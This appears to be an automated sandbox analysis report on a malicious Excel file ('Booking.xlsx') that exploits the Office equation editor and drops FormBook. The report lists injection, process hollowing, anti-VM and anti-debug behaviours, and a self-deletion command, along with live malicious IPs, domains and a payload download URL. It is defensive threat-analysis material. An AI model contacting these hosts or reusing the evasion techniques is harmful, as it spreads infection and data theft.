Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_00410FA6 push ebx; ret 6_2_00410FA7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095DFA1 push ecx; ret 6_2_0095DFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003DE3E6 pushad ; ret 6_2_003DE3E7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DDFA1 push ecx; ret 8_2_021DDFB4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DB124 push 423E369Ah; iretd 8_2_000DB12B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D6625 push ds; retf 8_2_000D6626
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D7867 push edx; retf 8_2_000D7869
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCEB5 push eax; ret 8_2_000DCF08
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF0B push eax; ret 8_2_000DCF72
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF02 push eax; ret 8_2_000DCF08
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCF6C push eax; ret 8_2_000DCF72
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DDF6E push ds; ret 8_2_000DDF77
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D0FA6 push ebx; ret 8_2_000D0FA7
Source: initial sample Static PE information: section name: .text entropy: 7.61467077394

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1] Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1] Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Booking.xlsx Stream path 'EncryptedPackage' entropy: 7.9999180457 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.2342320.3.raw.unpack, type: UNPACKEDPE
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0 Jump to behavior
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2924 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2920 Thread sleep time: -104858s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2448 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2448 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 552 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2264 Thread sleep time: -50000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools48*m\
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.2192413484.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: *m"SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.2185690395.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_009626F8 mov eax, dword ptr fs:[00000030h] 6_2_009626F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E26F8 mov eax, dword ptr fs:[00000030h] 8_2_021E26F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.165 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DA0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356846 Sample: Booking.xlsx Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 64 19 other signatures 2->64 10 EQNEDT32.EXE 13 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 46 thdyworkfinerainbotm.dns.army 103.141.138.118, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->46 48 ow.ly 54.67.120.65, 49165, 80 AMAZON-02US United States 10->48 34 C:\Users\user\AppData\Local\...\svchost[1], PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        38 C:\Users\user\Desktop\~$Booking.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 50 Multi AV Scanner detection for dropped file 17->50 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->52 54 Tries to detect virtualization through RDTSC time measurements 17->54 56 Injects a PE file into a foreign processes 17->56 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process9 signatures10 66 Modifies the context of a thread in another process (thread injection) 20->66 68 Maps a DLL or memory area into another process 20->68 70 Sample uses process hollowing technique 20->70 72 Queues an APC in another process (thread injection) 20->72 25 explorer.exe 20->25 injected process11 dnsIp12 40 tiwapay.com 81.169.145.165, 49168, 80 STRATOSTRATOAGDE Germany 25->40 42 jtelitetraining.com 160.153.136.3, 49167, 80 GODADDY-AMSDE United States 25->42 44 2 other IPs or domains 25->44 74 System process connects to network (likely due to code injection or exploit) 25->74 29 NETSTAT.EXE 25->29         started        signatures13 process14 signatures15 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.141.138.118
unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN false
160.153.136.3
unknown United States
21501 GODADDY-AMSDE true
54.67.120.65
unknown United States
16509 AMAZON-02US false
81.169.145.165
unknown Germany
6724 STRATOSTRATOAGDE true

Contacted Domains

Name IP Active
ow.ly 54.67.120.65 true
jtelitetraining.com 160.153.136.3 true
thdyworkfinerainbotm.dns.army 103.141.138.118 true
tiwapay.com 81.169.145.165 true
www.jtelitetraining.com unknown unknown
www.tiwapay.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite true
  • Avira URL Cloud: malware
unknown